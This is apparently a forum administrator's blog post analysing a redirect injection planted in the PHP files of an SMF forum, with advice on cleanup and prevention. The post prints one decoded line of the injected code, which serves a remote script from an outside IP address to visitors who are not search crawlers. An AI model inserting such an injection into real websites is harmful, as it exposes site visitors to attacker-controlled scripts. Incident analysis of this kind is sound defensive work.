At first I thought it was human malice but it turns out to be just another bot. A new kind of spam-bot that reprograms websites to redirect to a URL it wants its victims to visit. Yesterday it hit and within the hour I received e-mails from users about the forums redirecting them to random websites. My initial reaction was to panic – how on earth could someone modify my website without having access to the files remotely.

After considering what has happened logically if someone had complete access to the files then why didn’t they just delete the website and have it simply direct to theirs? Well the logical answer would be to assume either they didn’t have complete access or their intention is to hide the code that redirects visitors so that it wouldn’t cause suspicion, (by hiding I mean it still allows users to access the forum after 1 re-direct) therefore extending the life-time of the redirection code in order to get more visitors. Well we can say they didn’t have full access otherwise they’d make themselves the admin of the forums and spam everyone’s e-mail address in the database (Which hasn’t happened). The problem is I’m talking as if it were a human being who attacked the forums. We have to assume a human wrote the bot that attacked the forums though.  Whose primary intention would probably be to get more hits on their own websites?

After cleaning my site manually I did find that SMF do offer a cleanup utility which can detect and clean the infected files for you. That is available here

Instead of simply cleaning the files I wanted to decode the “code” that had been injected into the forums. First the bot injected its code in an encoded state as shown below:

Screenshot of exploit source code
Screenshot of exploit source code

If we run this through a base64 decoder we will get something that looks like this:

if (!stristr($_SERVER[“HTTP_USER_AGENT”],”googlebot”)&& (!stristr($_SERVER[“HTTP_USER_AGENT”],”yahoo”))) { return “<script src=”http://61.4.82.XXX/js.php”></script>” };

In English this is something like.. If you are a Google bot or a Yahoo bot return this script. (This is how Google and Firefox marked my site as containing malware. No doubt that JavaScript contains lots of nastiness) since most people on my forum are neither a google bot nor a yahoo bot we don’t care what happens there so much. The next part of the code was encoded in zip format (The guy who wrote this obviously didn’t want people to see the source of his ‘fine’ work of art). I am not posting that part of the code here has its too long. I will tell you what it did though

If visitor has not been redirected yet then redirect them and then write it in their cookies so next time they do not get re-directed again. (Making it appear to a random glitch)

This is not enough to prevent re-infection and we should be more concerned with how this could be allowed to happen in first place. This I am still not certain of yet. However I have taken steps to prevent the site rewriting its own scripts (which is how the exploit would have to operate unless the bot knew my FTP account details which i doubt they do). I suggest SMF admins take the following steps to prevent infection.

  • If you are currently infected then delete and re-upload the entire site (don’t just clean them unless your willing to read every php file because there could be an unknown php script which could re-infect the site). The infection appeared to only affect PHP scripts on the forum and outside of it. This doesn’t mean the exploit cant infect html files or any other file for that matter. Check the “last modified” dates on each file in your entire site)
  • You might want to consider preventing PHP files from overwriting themselves from another PHP file (with file permissions) this is optional and could potentially break the PHP script in question. Some PHP files need to rewrite other PHP files when updating etc. However usually they can still operate without requiring this functionality. This isn’t a permanent solution and i would only recommend it to people who know how to do it. That’s why I am not explaining how to do it.
  • Delete add-ons and mods that are made by newbie programmers or questionable programmers. (Add-ons have the potential of opening holes in your forum. This may not be intentional and this could simply be the fact the programmer has overlooked something)

Things that probably wont help (in this case) is preventing the uploading of certain file types or changing passwords. However that’s generally good practice anyway.

I take no responsibility if you break your site following my instructions! I am writing it for the benefit of others.

I have verified the scripts over and over every few hours. When I find out how the site got infected I will post something about it.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>